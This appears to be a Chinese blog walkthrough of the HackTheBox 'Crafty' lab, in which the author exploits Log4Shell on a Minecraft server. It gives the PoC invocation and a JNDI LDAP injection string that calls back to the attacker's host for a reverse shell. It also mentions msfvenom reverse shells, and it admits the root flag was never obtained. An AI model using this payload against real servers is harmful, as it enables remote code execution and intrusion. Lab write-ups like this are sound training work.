HackTheBox-Crafty

每日一更 HackTheBox 系列

HackTheBox-Crafty

温馨提示 本期环境很讨厌 非常讨厌  我没获取到管理员flag  因为他的环境有问题 

攻击:10.10.16.2

靶机:10.10.11.249

先扫描

80端口 iis10.0

访问看看

老规矩 写hosts

访问爆出子域名

再写hosts 发现这个play. 就是他自己的域名   iis10.0 没有exp可以用   扫描目录也没扫出来啥 那回到扫描结果 加个-p- 参数 重新扫描 端口应该没扫完

果然还有个端口25565 

 minecraft Minecraft 1.16.5  我的世界??!!!?我的世界?!  万万没想到啊 这个服务器竟然是我的世界服务器

那怎么整呢 下载我的世界呗

kali 基于Debian开发的所以下载Debian版本

dpkg -i '/root/Downloads/Minecraft.deb' 
apt-get -f install

我的世界 启动!

对于这个漏洞 其实我还是不太懂

官方发出的攻略 HackTheBox-Crafty

log4j漏洞 利用的POC log4j-poc

启动以后需要 Microsoft 账号

安装 log4j poc 的依赖

修改poc里面的命令 改成 cmd  /bin/bash 是Linux的但是目标靶机是windows

还得需要Java8 这里建议做一个快照 毕竟kali新版 Java是17 我最喜欢的版本 你回到Java8 的话 他新版的burp 可能用不了

需要 Minecraft 游戏本身或 Minecraft 客户端连接到目标上运行的 Minecraft 服务器。刚刚下载的我的世界游戏启动以后好卡 

GitHub - ammaraskar/pyCraft: Minecraft-client networking library in Python

为此，我决定使用 PyCraft，一个 Minecraft Python 客户端库。

但是 pycraft 这个工具我试了下官方的文档给出的方法不好使

所以新的办法

wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
tar -zxf jdk-8u181-linux-x64.tar.gz
mv jdk1.8.0_181 jdk1.8.0_20
# 下载好 TLauncher-2.899 链接 : https://tlauncher.org/en/
# 
./jdk1.8.0_181/jre/bin/java -jar ./TL/TLauncher-2.899.jar

连接服务器

然后执行poc

 python3 poc.py --userip 10.10.16.2 --webport 8888 --lport 9001
自己的IP 然后web端口 监听端口

启动游戏 按一下 / 然后删除这个 字符

发送

 ${jndi:ldap://10.10.16.2:1389/a} 

然后反弹shell 就OK了

在用户的桌面上获取flag

使用 msfvenom 生成第一个 Meterpreter 反向壳

要使用 msfvenom 创建 Meterpreter 反向 shell，我们首先需要选择一个有效载荷。为此，我们必须确定目标计算机的体系结构。我们可以通过在命令提示符下执行命令“”来检索处理器体系结构。

在server/plugins 文件夹当中看到一个jar包

下载这个jar包 反编译

接下来的步骤去我上面发的那个官方链接看看  这个反弹shell反弹不回来了 一直在连接

我服了这什么NT环境重启了好几次 只要断了就不能重连上

怪不得评分2.多 这垃圾环境  我也用了它自带的 PwnBox 自带环境也不行

多无语啊